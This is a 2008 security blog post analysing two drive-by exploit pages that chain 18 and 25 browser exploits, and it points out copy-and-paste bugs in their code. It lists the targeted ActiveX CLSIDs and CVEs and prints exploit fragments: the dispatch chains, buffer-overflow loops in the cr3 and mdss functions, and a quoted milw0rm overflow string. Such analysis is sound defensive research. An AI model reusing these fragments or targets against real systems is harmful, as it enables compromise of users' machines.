marco
blog
Menu:
18, 25 exploits: who gives more? Oh, and 2 bugs.
October 29, 2008
Just a couple of weeks ago I was thinking that 17 exploits in one JavaScript attack were many. Well, it isn't so. I've recently stumbled upon a couple of pages that contain 18 and 25 different exploits. The domains that host the pages are, respectively, google-analistyc.net and 85.17.166.230.
if (
office() ||
dl() ||
pdf() ||
wme() ||
ya1() ||
ya2() ||
fb() ||
mdss() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
) {}
Here are the exploits we haven't already seen:
- The recent Windows Media Encoder
(
A8D3AD02-7508-4004-B2E9-AD33F087F43C) buffer overflow (CVE-2008-3008). - Yahoo! Webcam Uploader (
9D39223E-AE8E-11D4-8FD3-00D0B7730277) buffer overflow via longserverproperty followed by an invocation of thereceivemethod (CVE-2007-3147). - Yahoo! Webcam Viewer (
DCE2F8B1-A520-11D4-8FD0-00D0B7730277) buffer overflow via longserverproperty followed by an invocation of thesendmethod (CVE-2007-3148). - Aurigma/Facebook Photo Uploader (
5C6698D9-7BE4-4122-8EC5-291D84DBD4A0) overflow in theExtractIptcandExtractExifproperties (CVE-2008-0660). - ActiveVoice (
EEE78591-FE22-11D0-8BEF-0060081841DE) buffer overflow via longModeNameparameter in theFindEnginefunction (CVE-2007-2222).
The second page has 25 exploits:
if (
mdac() ||
dl() ||
flash() ||
pdf() ||
wme() ||
wfi() ||
com() ||
ya1() ||
ya2() ||
fb() ||
mdss() ||
cr1() ||
cr2() ||
cr3() ||
cr4() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
ntaudio()
) {}
Here, the "new" ones are:
- iMesh (
7C3B01BC-53A5-48A0-A43B-0C67731134B9) overflow in SetHandler method (CVE-2007-6493). - Stack-based overflow in Ask Toolbar
(
5A074B2B-F830-49de-A31B-5BB9D7F6B407) (CVE-2007-5107). - Stack-based overflow in IncrediMail IMMenuShellExt control
(
F8984111-38B6-11D5-8725-0050DA2761C4) via DoWebMenuAction function (CVE-2007-1683).
Now, regarding the second part of the title: there seem to be at least two bugs in these exploit codes.
First, the function cr3 instantiates the control
07B18EAB-A523-4961-B6BB-170DE4475CCA and then sets the property
ShortFormat. This property doesn't seem to exist. ShortFormat is,
instead, the attack vector for the exploit against the Ask Toolbar
(included in the cr2 function). It's probably a case of wrong
copy-and-paste.
function cr3() {
try {
var obj = null;
obj=cobj("{07B18EAB-A523-4961-B6BB-170DE4475CCA}");
if(obj) {
ms2();
arg1 = unescape("\x0c");
while(arg1.length<0x200) arg1+=unescape("\x0c");
obj.ShortFormat = arg1;
}
} catch(e) {}
return 0;
}
Second, and this is present in both pages, the mdss function gets
wrong its memory allocation. In fact, it creates a string (in the buf
variable) and doubles its length in a loop that should execute 9999
times. Of course, this doesn't bode well: the machine will likely lock
up before the offending process goes out of memory and, finally, gets
killed.
function mdss(){
try {
var obj=null;
obj=cobj("{EEE78591-FE22-11D0-8BEF-0060081841DE}");
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
for (i=1;i<=9999;i++)
buf += buf;
EngineID="default";
...
Interestingly, the original milw0rm exploit did the right thing:
var buf = unescape("%u4141");
while (buf.length <= 261) buf = buf + unescape("%u4141");
Probably, another case of wrong copy-and-paste...
To leave a comment, complete the form below. Mandatory fields are marked *.